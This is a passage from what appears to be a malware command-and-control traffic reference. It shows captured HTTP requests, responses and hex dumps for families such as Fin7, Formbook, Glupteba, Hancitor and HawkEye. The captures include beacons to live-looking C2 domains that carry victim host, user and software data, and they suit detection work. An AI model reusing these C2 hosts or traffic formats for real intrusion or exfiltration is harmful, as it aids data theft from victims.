KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5pjgODTtZORmS4jeVWQV\\\\nvs71Fz\\/NH7IWyR7an0L+rLo1S7Jrqn64J8LXlT\\/1eiDN87tYle5AlB4\\/vmf4Uo98\\\\ncMG\\/E+NbFLtyRyxTq4RmaNDjyvTPIXbBl+cMU4yIwBKT89D8tuD6PhdfVVjMx71l\\\\niEPtuNb5pD38EYGv\\/3+Yrwvg3sU1+aiIWdZgPX3ieFxAL3ZZkvlr5\\/XeNpKqGAiT\\\\n6YBjLZg7R\\/5j5Knhex+gKUR2Gkh2CG7mWqjcaNUK9Hzkgk3\\/UmqopxokpSTkHmUT\\\\nSlN5mKAg438TmIUz4MCnnieexOtpcg7Fmn2wPObgdIG3OXK5yfxxExa+TBDTbCFc\\\\ngQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"Em9SPAhlG3hXHt713xEY92niynachhsXeWwCv6cB\"}\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/stopfilecoder.png \"Expiro\")\n\n\n#### Fin7 JS Backdoor\n~~~\nPOST /pictures/delete?type=name HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/x-www-form-urlencoded; Charset=UTF-8\nAccept: */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0\nContent-Length: 326\nHost: moviedvdpower.com\n\nlwirwavfynacqo=PKWFG%04S@XZ%16l%04%0E%00%02%00f%09%02%06%09%1EAC%04%0D%02%05%1FKVTK%5DG%0AX%08%07%0F%0D%00W%05%5B%5DQ%05%0D%0AV%0F%0B%5B%0B%03%0E%0FP%03%0B%01%06%0E%0C%5D%06V%1FLZZ%5C%05%02%05%09%08%03%07%1FMZS%04%0E%01%05%1FQW%0A%0C%0A%09%02%0D%02%03%07%03%0Cr%0Dx%7C%09%05%08gfD%5CJ%1Egz%1ECV%5E%5Dl%5E%5D%05%5DRN%26_%267983\n\nHTTP/1.1 200 OK\nServer: nginx/1.12.2\nDate: Tue, 15 Oct 2019 16:27:41 GMT\nContent-Type: text/html; charset=UTF-8\nContent-Length: 0\nConnection: keep-alive\n\nPOST /new/new?type=name HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/x-www-form-urlencoded; Charset=UTF-8\nAccept: */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0\nContent-Length: 306\nHost: moviedvdpower.com\n\nlwirwavfynacqo=PG_EG%08%5BCXV%1Eo%04%02%08%01%00j%01%01%06%05%16BC%08%05%01%05%13CUTGUD%0AT%00%04%0F%01%08T%05WUR%05%01%02U%0F%07S%08%03%02%07S%03%07%09%05%0E%00U%05V%13DYZP%0D%01%05%05%00%00%07%13EYS%08%06%02%05%13YT%0A%00%02%0A%02%01%0A%00%07%0F%04q%0Dtt%0A%05%04oeDPB%1Dgv%16@VRUo%5EQ%0D%5ERB%26_%267500\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/fin7jsbackdoor.png \"Fin7 JS Backdoor\")\n\n#### Firebird RAT\n~~~\n00000000 53 00 00 00 00 00 00 00 S....... \n00000008 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 ........ ........\n00000018 00 06 01 00 00 00 3b 56 5c 5a 48 4b 05 67 66 3c ......;V \\ZHK.gf<\n00000028 22 0c 04 13 14 10 41 41 32 02 1c 06 08 06 2e 5b \".....AA 2......[\n00000038 5b 24 0c 1f 1a 5a 4d 59 61 50 32 15 01 0a 1f 5a [$...ZMY aP2....Z\n00000048 29 53 56 2b 43 59 15 34 3d 3d 03 0c 3c 22 0c 04 )SV+CY.4 ==..<\"..\n00000058 13 14 0b ...\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/firebird.png \"Firebird\")\n\n#### Flawedammyy\n~~~\n= ..\">h..K...t.......N<.\n.Q..1....%S-.8z...id=53292686&os=7 SP1 x86&priv=User+UAC&cred=USER-PC\\admin&pcname=USER-PC&avname=&build_time=08-08-2019 14:24:35 PM&card=0&\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/flawedammyy.png \"Flawedammyy\")\n\n#### Formbook\nformbook hostnames are almost always www\n~~~\nPOST /k9m/ HTTP/1.1\nHost: www.liuhe127.com\nConnection: close\nContent-Length: 3769\nCache-Control: no-cache\nOrigin: http://www.liuhe127.com\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nContent-Type: application/x-www-form-urlencoded\nAccept: */*\nReferer: http://www.liuhe127.com/k9m/\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\n\nSbh=A2oUV0jxRNQErH6gY3lxQtOCTuQwNTdWJ25sTcda3oav(0QcLnkBrePt5vgAKuqyhbAftuJA5G5D2fNVsLRL8o7GMMvu8SY6wR8pwXAraJm4TKmuw5(TglqswaX2VpD_gJ3yal4FZ1pkDvEP81iuj_l_mMoqsdCGaFMxmu8LQC1CZjkxIXbFtlEaQg0Wfzvxpk9XRS39rZxxdqjALdRL8_N2LHRzPN35WuoIIn2J0mUB7u7x~42TwXHpZcLTJ4cELO23a_seXaFdgz~QWrxi7L3N9oGrwrY4tSxRUCsHQCoAB8CsxlUDIkY67TYTnYPmJxKxE06yA9NA5buPXUU-rDGiNGDQ25(b371m2NNnyheUxDNxyL6wr0syvlQ7Qn~DvzJO1j4_01FUfdeQKDmT9nuRD7AXJYaO3DIZnG1RWkvBxF0H38hB8-R7b1kP1IZqlFNLuC1ttRMUWPoRYyiYb-5rzJXywgOQncCVwVXcwH8dkVBf8nIw1doGRbV0yBZciG1vmCQMiyqspdkDVZt-1KyQhCCDaZWgyx(jUEtrJ5ZzRRfL7eaLGAG1u46ihMFAoJdDXorJcFL051WdJ2wHBfyMv2c9wu1j78lVpEWNkON2Qnw-8VOoQrg4ItHc4WjdsmkjCk(8A-d-uwY70GE0UXkWhPpg~_8qCqj_XNsXD1Cku4u0im9ibvYCLeQyYDn_FmL-U7ZNtOIbYeTHchiTz3fwdILdormZDVBuDzJlRACku5YKuqCIZoTnxUBI(iGkeX0da3GEkWCi8MA6nuA390kyWjwjSpzGHFYPG0B41C5bU5KrJx(9qiFYNfQPZqv5KDyJL8tN7jrqIny7WzTVRqvRHCeerIFPL5vosxC_3QvH2AlElM8Ssx(QZqz22ySsvMzyq8Hv~3tMLtg8mgzByn2dH2WrNAM3nk~XXu(6GurJtah4M9tPmohFGPLZxX5e3WCJ~h16eNNM4OaV~MOGVYusVrPgqFUS6P7iizTBZS(MsulNfuAKYvUq2kUMtCYSZAt34TUY6bJ5BTPy~4ydE8n16XohSRP8VbqhLAZ4DGO2n-hfrK2o9oUsNUWcpZyKA2(9kXBftM3s5lzWT21wBKbcPaiPURUuV4eheOkTBTxTB_mMxCafVVE6yvbJD-XIpSazCu(sS7~QUEbh6EPrqsB11rhKlRPy39G2rLo6lSMHeGjCmI5Rc80lhtZyFKcqhNYbhwuiEn3uK9CodgYxVie6yY1MwI(M8VSBZ-zQjldjXnFN~7oKDW3JglzgbK3lzeDK5aRb0HTwohxi8M9lRkTKflhtcr77iOlBVcE6HYSbchngmsBWBgPwA75xvzJhUUtgjJlxLW~bSPMG7x7GLVfCZjxxrjki0R9ZPDVdx71eP4yoIdymwRgqddVSuGCAIf641vyoItI9QzfvvuZBdpRQi3ZEw7LUifYAyjYZ2Xd9KdOMiNiLLeLsDCgWib~5r8iSfExWtFjsEgOt(2W_0JQSAgplkqJxkO9YxSdB9xsPfeavxYirf7azw7UGnDTEMQUnMMECFM5_v29oh6tKvIolHPv_qZrW0nGwd0aCMfzUqcV0(NlfiEQOxVZTonlWkJoR3hyyZQ~dKGW9j_WbA-8s54GvC-VC~skS2jG4haG9bxKA6QZqRK4-2qI5o2U3rNoeQEz_~yMfZ2fQoftvSkgpJfcgjuh3qTOFK8b6OSe5wMnyLdniF_4xN3rO(73lGUB5l60LbBa4TAYc(Qn7pyfvhlhMx8nr0vm6kCom1xi-VN1M(fSDqNubOVR_8QORONDFaX41G3HYOrWQyQ5Cvd6lAFgWycF3KeaumEH0LEUP7vR3t8CqgQ5VqyDxtKNy0Z7MVbqsq6s8~aYdnUL5DxSG9pbe8LW4uDqLcBuZ2WiDWmdiRx0cbf9-s0qx6mSwAo(Wz67SmWp2X8VI3W4h3M3vf9BggKJQmHp7nLChKFWJWTuEGt43fxqjimz5WaRYtGOcdlH84XYvX9kEB1C4(Fp99P6VKHhrkuCOrtiirAvl7KvjXYhsiOn20cjKKUL6l8(aZofg6g(CqTpB5dDGN86Korg1L6advz28Cc9QidH5ZPIAHrWXi9nG5FtnBxG-3R2N(J6V~IGsC8NZIwv0qB~35YLhS9SlyD38(p(pgy9N3fPHO9Gzlzd6D3j74fN-N89jhcQTClusyQIhdjrYsqWnpi7Of2Hl9zRx(ut-kFP33A5zYLbDn54f9gg8kH1m(BeKfVXxVtpGLR4VQSBfZzVwPGnUei9aJDZkXwmg0xftRV~S3TxUucpU1d75Pa9NCvgMU51f7uv0XtF1S-0_nqUy(apdab1FJcSzLOVDXJDyOKr5P4px5QpKM1FZgH9mgQQZuo~rlcBi4jISUNx3qv7fwaBZ4KDYuICC1-KLeFh0i7YEU_njjPm31uzkYLlVxfbhAg6C7Fxcpr5_jzhW~me85m48ifV4C06qNAN5WgIGxJW07CUNAuLx2d4tZI85EWgoxQa3AOuINyalNllQZt2LBB~ReVqa8Gr3pLpZOSiDREVqDaruTFqNwAZndKWZ~CTIV4ss6txpH7ypXw3AZ4fiDn5j7NDtaJzXbptIpWgrv9yK(zab71BYxnEuPpsdZSnA2QWY9s300CraaT3RPj(gdt~5OjaG22qma1M9LYzgvBdIBH57aizchPopkjnWiJAuvabKSvJyEtKb5Ni67H1WbOnOKM8pMcqsaIBi1AfQV0PbikKmG-HikPS86JBnJXZs8BWrbgm7g8uGrVpnnuHbHuP4p4xAOgYNPDbnpSoXn0kH~vUc1JxLurnAnNWMmYgA5g3fIw7HGvJSnKn6DDHod7HUKWF3ggfFJdZbucZxbJ2fpE64O6nKFy9It-R0BRZqcunVVvWy4zwCQ_1brWO78sSQY3WY4Es8kI6nl5hc9k3dhAWgQJWeqVrUGnOyxnf3wP9Tjc3fbhhfMthKeTVJEn485mDsUhxaOlIUrAoNDk1Kmua8F3zzcHpo~ixmjApivEsgkkIIni~mHnw4sce0IaJmWT9Ka_FCRQTC3dNAkBJHjcfTsYpgDvJBeZI8V7tnXTcJwQShoQoTdzOUvebgdia2s6HyC8Ay3lybE0Kvi4Ufu2qeJDnpSdiZAi8Ba-AzxnhL~66T~sQU0SY1ZDTJsdMD9zA8h5A0g71lMEIFSEdczwnvBeXpuEiaX9FOoJQwoIyyq4KmaeML~f5ipBL5MgqKf36tQ4N9jiM0IMAZdarP~ZkdSRs6dnJ7bU4FFMvQUrM0EGSJMQfLAvB7d_c0IwGUl44oifYX7n8cNJQcRPEFt1PZYPKE47I_JQ2CSVE9Scfi6hmF2mrjjozj0NQFcK5B~W~c3GpQxJ8e9cNoWhrkZNK1CyKcuTjHkfWA5Bzoi5p5mrTFsA12M25Ubt5SuEd-grtNyFbdev6Uyoislno4UJ9J6-8ag6iZXJd_QI17cAFS4P71bi7ApOh50qN4cNMIQBUTQyriS5BG~os6RMAuoaSUq92eNx12764W~RIGssW6ItGJFcg09D9nPLTs9jUhkhVwPicIhcak5ZLrkASapi44847mp8bI7hAIINPrZaKEyXejiDm5OUm7UVGno15_(251Jq3-Aic6sgovlTvlWBTFSkikUCmSMDX96nLlTuNiC2BD42WLJfGoZQw4T341YKl3rFShZ24mtmUGThc4k-k1OxGK1ygo5wLOg_H_Bs9MfxPn3aoIQiBq(XC7l4Xzw2LREItIvFPQXoWU(dxz3g)..\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/formbook.png \"Formbook\")\n\n#### GET2Loader (TA505):\n~~~\nPOST /2021 HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; CIBA; MS-RTC LM 8)\nContent-Length: 95\nHost: windows-sys-update.com\n\n&D=User-PC&U=admin&OS=6.1&PR=Dwm.exe%7CEXCEL.EXE%7CExplorer.EXE%7Ctaskhost.exe%7Cwindanr.exe%7CHTTP/1.1 404 Not Found\nServer: nginx/1.10.3\nDate: Wed, 09 Oct 2019 18:53:18 GMT\nContent-Length: 0\nConnection: keep-alive\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/ta505-loader.png \"TA505 Loader\")\n\n#### Glupteba\n~~~\nPOST /bots/post-ia-data?uuid=de7cfeb2-8d6a-480d-9043-488b8a616d7b HTTP/1.1\nHost: venoxcontrol.com\nUser-Agent: Go-http-client/1.1\nContent-Length: 8843\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip\n\n[{\"display_name\":\"Security Update for Microsoft Office 2010 (KB2289161)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"DXM_Runtime\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030\",\"display_version\":\"11.0.61030\",\"install_date\":\"20180208\"},{\"display_name\":\"Microsoft Office Proof (French) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Security Update for Microsoft Office 2010 (KB2289078)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Outlook Social Connector (KB2289116) ..........s\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Definition update for Microsoft Office 2010 (KB982726)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Security Update for Microsoft Publisher 2010 (KB2409055)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"IEData\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Visual C++ 2019 X64 Additional Runtime - 14.21.27702\",\"display_version\":\"14.21.27702\",\"install_date\":\"20190321\"},{\"display_name\":\"Microsoft Office Proof (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Office Shared 32-bit MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702\",\"display_version\":\"14.21.27702.2\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Office Professional 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Office Publisher MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Office Outlook MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Update for Microsoft Office 2010 (KB2202188)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Update for Microsoft Office 2010 (KB2413186)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Google Update Helper\",\"display_version\":\"1.3.33.23\",\"install_date\":\"20190319\"},{\"display_name\":\"IE40\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"IE4Data\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Java 8 Update 92 (64-bit)\",\"display_version\":\"8.0.920.14\",\"install_date\":\"20180208\"},{\"display_name\":\"Update for Microsoft Office 2010 (KB2413186)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"VLC media player\",\"display_version\":\"2.2.6\",\"install_date\":\"\"},{\"display_name\":\"WinRAR 5.60 (64-bit)\",\"display_version\":\"5.60.0\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Office Single Image 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Office Access Setup Metadata MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Adobe Flash Player 27 PPAPI\",\"display_version\":\"27.0.0.187\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702\",\"display_version\":\"14.21.27702\",\"install_date\":\"20190321\"},{\"display_name\":\"Mozilla Firefox 67.0.4 (x64 en-US)\",\"display_version\":\"67.0.4\",\"install_date\":\"\"},{\"display_name\":\"SchedulingAgent\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Office Excel MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Office Shared MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Skype... 7.39\",\"display_version\":\"7.39.102\",\"install_date\":\"20180208\"},{\"display_name\":\"CCleaner\",\"display_version\":\"5.35\",\"install_date\":\"\"},{\"display_name\":\"Microsoft .NET Framework 4.7.2\",\"display_version\":\"4.7.03062\",\"install_date\":\"20190321\"},{\"display_name\":\"Microsoft Office Access MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Update for Microsoft Office 2010 (KB2413186)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Adobe Acrobat Reader DC MUI\",\"display_version\":\"15.007.20033\",\"install_date\":\"20180208\"},{\"display_name\":\"MPlayer2\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161\",\"display_version\":\"9.0.30729.6161\",\"install_date\":\"20180208\"},{\"display_name\":\"Microsoft Office Proofing (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702\",\"display_version\":\"14.21.27702\",\"install_date\":\"20190321\"},{\"display_name\":\"Microsoft Office Proof (Spanish) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.21.27702\",\"display_version\":\"14.21.27702\",\"install_date\":\"20190321\"},{\"display_name\":\"Adobe Flash Player 27 ActiveX\",\"display_version\":\"27.0.0.187\",\"install_date\":\"\"},{\"display_name\":\"Adobe Flash Player 27 NPAPI\",\"display_version\":\"27.0.0.187\",\"install_date\":\"\"},{\"display_name\":\"Google Chrome\",\"display_version\":\"75.0.3770.100\",\"install_date\":\"20180208\"},{\"display_name\":\"Microsoft Office Word MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Update for Microsoft OneNote 2010 (KB2433299)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Office OneNote MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005\",\"display_version\":\"12.0.21005\",\"install_date\":\"20180208\"},{\"display_name\":\"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Realtek AC'97 Audio\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"MobileOptionPack\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Office PowerPoint MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702\",\"display_version\":\"14.21.27702.2\",\"install_date\":\"\"},{\"display_name\":\"Update for Microsoft .NET Framework 4.7.2 (KB4087364)\",\"display_version\":\"1\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030\",\"display_version\":\"11.0.61030.0\",\"install_date\":\"\"},{\"display_name\":\"AddressBook\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Security Update for Microsoft Word 2010 (KB2345000)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Office Shared Setup Metadata MUI (English) 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Microsoft .NET Framework 4.7.2\",\"display_version\":\"4.7.03062\",\"install_date\":\"\"},{\"display_name\":\"Connection Manager\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Fontcore\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Security Update for Microsoft Office 2010 (KB2289161)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005\",\"display_version\":\"12.0.21005\",\"install_date\":\"20180208\"},{\"display_name\":\"Mozilla Maintenance Service\",\"display_version\":\"67.0.4\",\"install_date\":\"\"},{\"display_name\":\"Notepad++ (64-bit x64)\",\"display_version\":\"7.5.1\",\"install_date\":\"\"},{\"display_name\":\"WIC\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"QEMU guest agent\",\"display_version\":\"2.10.68\",\"install_date\":\"20190730\"},{\"display_name\":\"Update for Microsoft Outlook Social Connector (KB2289116)\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Office Office 32-bit Components 2010\",\"display_version\":\"14.0.4763.1000\",\"install_date\":\"20180126\"},{\"display_name\":\"Java Auto Updater\",\"display_version\":\"2.8.92.14\",\"install_date\":\"20180208\"},{\"display_name\":\"DirectDrawEx\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"IE5BAKEX\",\"display_version\":\"\",\"install_date\":\"\"},{\"display_name\":\"Opera 12.15\",\"display_version\":\"12.15.1748\",\"install_date\":\"\"},{\"display_name\":\"Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219\",\"display_version\":\"10.0.40219\",\"install_date\":\"20180208\"},{\"display_name\":\"Microsoft Visual C++ 2005 Redistributable (x64)\",\"display_version\":\"8.0.61000\",\"install_date\":\"20180208\"},{\"display_name\":\"Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030\",\"display_version\":\"11.0.61030\",\"install_date\":\"20180208\"},{\"display_name\":\"Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501\",\"display_version\":\"12.0.30501.0\",\"install_date\":\"\"}]\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/glupteba-1.png \"Glupteba\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/glupteba-2.png \"Glupteba\")\n\n#### Godzilla Loader\n~~~\nGET /gate16.php?g=-994429369&k=7NLp9MrFuKWnfhYAmxKEcsWO2 HTTP/1.1\nAccept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\nHost: filesdb.ru\nConnection: Keep-Alive\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Sat, 01 Sep 2018 12:12:58 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nKeep-Alive: timeout=60\nSet-Cookie: PHPSESSID=btq14ialn2bbefrsvedfspt9s4; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nContent-Encoding: gzip\n\n
IKqglmKsWN8CSCWpwIItt6O/sFpxceFdZPucGXeeUi1CbtjgXllqiSnOcsojWNxNP8ySG4XsKU94bKJh2vFSAtqb+g939WslRHMzKsr2YaDwN51PG9a/CZ/BVaK3Idznf3tkNJAy9+6r6vj/9spjxPp1+pqK3DrdVr7uJG0xkSv8Ez7fmCPgc4YrHpSk2cMvODT9bbv1eNE4zjGd+N4t3Lhp/+k48QWtGIQ48A6Q9HzhWO1L4SpVawEVg/hbN+EJSCVhQCIljVpvrcyeY6w1yX9QT5TSZosQlbzog3mLceYYz1teNlHwhGToXVDb9ACyxlo/FrdlapR/R0jCx0F+OQ==
\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/godzilla.png \"Godzilla Loader\")\n\n#### GrandSteal\n~~~\nGET /websocket HTTP/1.1\nHost: 162.218.122.115:2012\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Version: 13\nSec-WebSocket-Key: Yzg2MDllOTctZGYzMCOOZQ==\nOrigin: ws://162.218.122.115:2012\n\nHTTP/1.1 101 Switching Protocols\nServer: nginx\nDate: Fri, 18 Oct 2019 00:41:37 GMT\nConnection: upgrade\nUpgrade: WebSocket\nSec-WebSocket-Accept: 3pYl7XQW+GMu4ydBWBEUXbuIKJo=\n\n.þ... o>..Í8).i<. e-_A.Mjc.WjN.mjT.WaG.,.U.SnJ%._y.>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>\n. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>\n. o>. o>. o>. o>. o>. o>. o>. o>. o>. o>\n\n.~...\"ª..Ê.......... .(.8.@...ugmajJAPYc\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/grandsteal.png \"GrandSteal\")\n\n#### Hancitor\n~~~\nPOST /4/forum.php HTTP/1.1\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\nHost: spausence.com\nContent-Length: 108\nCache-Control: no-cache\n\nGUID=8996434259757519954&BUILD=0210_328487&INFO=USER-PC @ USER-PC\\admin&IP=89.187.165.57&TYPE=1&WIN=6.1(x64)HTTP/1.1 200 OK\nServer: nginx/1.10.3\nDate: Thu, 03 Oct 2019 17:17:51 GMT\nContent-Type: text/html\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-Powered-By: PHP/5.4.45\n\nFFUUARZAEg4OCkBVVQ0NDVQVFB8eEx0TGBUCVBkVF1UNClcZFRQOHxQOVQoWDx0TFAlVCRcbCA5XCRYTHh8IV0lVExQZFg8eHwlVSwYSDg4KQFVVDQ0NVA4SGVcbFBQfAlQZFRdVDQpXGRUUDh8UDlVLBhIODgpAVVUXGw4fCBMbFlcUHwgPHlQID1UNClcTFBkWDx4fCVUKFRcVVUsGEg4OCkBVVRkWHwwfCB8eDxkbDhMVFFQZFRdUGw9VDQpXExQZFg8eHwlVDRMeHR8OCVVLBhIODgpAVVUfGRsIHwoSVBUIHVUNClcZFRQOHxQOVQoWDx0TFAlVGBgKFQ0fCAobGRFVExQZFg8eHwlVSwcBGEASDg4KQFVVDQ0NVBUUHx4THRMYFQJUGRUXVQ0KVxkVFA4fFA5VChYPHRMUCVUJFxsIDlcJFhMeHwhXSVUTFBkWDx4fCVVIBhIODgpAVVUNDQ1UDhIZVxsUFB8CVBkVF1UNClcZFRQOHxQOVUgGEg4OCkBVVRcbDh8IExsWVxQfCA8eVAgPVQ0KVxMUGRYPHh8JVQoVFxVVSAYSDg4KQFVVGRYfDB8IHx4PGRsOExUUVBkVF1QbD1UNClcTFBkWDx4fCVUNEx4dHw4JVUgGEg4OCkBVVR8ZGwgfChJUFQgdVQ0KVxkVFA4fFA5VChYPHRMUCVUYGAoVDR8IChsZEVUTFBkWDx4fCVVIBwEIQBIODgpAVVUNDQ1UFRQfHhMdExgVAlQZFRdVDQpXGRUUDh8UDlUKFg8dExQJVQkXGwgOVwkWEx4fCFdJVRMUGRYPHh8JVUkGEg4OCkBVVQ0NDVQOEhlXGxQUHwJUGRUXVQ0KVxkVFA4fFA5VSQYSDg4KQFVVFxsOHwgTGxZXFB8IDx5UCA9VDQpXExQZFg8eHwlVChUXFVVJBhIODgpAVVUZFh8MHwgfHg8ZGw4TFRRUGRUXVBsPVQ0KVxMUGRYPHh8JVQ0THh0fDglVSQYSDg4KQFVVHxkbCB8KElQVCB1VDQpXGRUUDh8UDlUKFg8dExQJVRgYChUNHwgKGxkRVRMUGRYPHh8JVUkH\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/hancitor.png \"Hancitor\")\n\n#### Hawkeye keyogger\n~~~\nFrom: mosharrof@mhcapparels.com\nTo: mosharrof@mhcapparels.com\nDate: 9 Oct 2019 01:57:35 +0100\nSubject: HawkEye Keylogger - Reborn v9 - Passwords Logs - admin \\ USER-PC -\n 89.187.165.47\nContent-Type: text/plain; charset=utf-8\nContent-Transfer-Encoding: 